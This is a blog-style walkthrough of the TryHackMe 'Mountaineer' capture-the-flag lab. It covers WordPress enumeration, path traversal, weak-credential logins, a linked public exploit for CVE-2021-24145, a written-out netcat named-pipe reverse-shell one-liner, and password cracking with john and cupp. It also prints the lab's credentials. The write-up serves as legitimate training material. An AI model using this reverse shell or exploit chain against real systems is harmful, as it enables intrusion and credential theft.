Post

TryHackMe Mountaineer

Posted Updated
By
2 min read

Mountaineer tryhackme

MOUNTAINEER The Mountaineer room on TryHackMe is a beginner-friendly CTF challenge that focuses on Linux enumeration and privilege escalation. The task involves discovering hidden files, exploring SSH access, and exploiting common misconfigurations or weak permissions to gain elevated privileges on the system. This room is great for reinforcing fundamental skills in Linux privilege escalation and system enumeration.

alt text

For initial recon i used rustscan with -sCV flag alt text alt text

Port 22 (SSH): Running OpenSSH 8.9p1 on Ubuntu Port 80 (HTTP): Running nginx 1.18.0 on Ubuntu To gather more detailed information, I followed up with a Nmap scan on the detected ports, which provided additional details:

The SSH server uses ECDSA and ED25519 host keys. The HTTP service is running nginx, supporting basic methods like GET and HEAD. The default nginx welcome page was displayed, suggesting no specific web application was immediately accessible.

alt text I run a ffuf scan and i found wordpress directory

alt text This is the wordpress website, in the mean time i used ffuf to enumerate for more directories

alt text we can see a domain name here so add it to /etc/hosts

alt text

alt text This is the website

alt text Use wpscan for more info, and

alt text we can see a theme is installed init I used to exploit it but it didnt worked

alt text Also we got some usernames:

ChoOyu Everest MontBlanc admin everest montblanc chooyu k2

save into a text file.

alt text we can see a image directory , capture the request

alt text We can see a potential path traversal here

alt text I used chat gpt to find the location of ngix that we can get some info

alt text this is the intersting location that i found

alt text we can see a vhost name there, add it to /etc/host file

alt text

alt text Its a login page, it requires creds, so i tries SQL injection and other login bypass methos, nothing worked so i used the username that we got from WP scan to bypass it

k2:k2

is the usename and password

alt text

alt text

i got a password

th3_tall3st_password_in_th3_world

And another intersting mail alt text

We already have a password and username , so i used it against wp-admin

k2:th3_tall3st_password_in_th3_world it worked alt text

If we have the authentication we can use the exploit CVE-2021-24145

https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145

we can download it from here

And exploit it alt text

we got a shell

alt text

rm /tmp/f;mkfifo /tmp/f;cat /tmp/fsh -i 2>&1nc ip port >/tmp/f

I used this to get the reverse shell alt text

alt text

alt text we can see a backup file here , get into my system and analyse it

http.server method doesnt worked so i used nc method to transfer file

alt text alt text

I used john to crack the password

alt text

But the rockyou is’t working for me , and its taking too much time, so i created a custom wordlist to crack it

We can use tools like Crunch,cewl, cupp to do this,

i used cupp , Because alt text

this format looks similar to the cupp

alt text we got out custom wordlist

alt text

The password is cracked

alt text

Basic Commands

alt text

alt text

We got a username and password , its probaly for ssh alt text

alt text

Login using ssh alt text

alt text We can direcly get the root password brom the bash history

alt text

tryhackme ctf
This post is licensed under CC BY 4.0 by the author.

Trending Tags

ctf tryhackme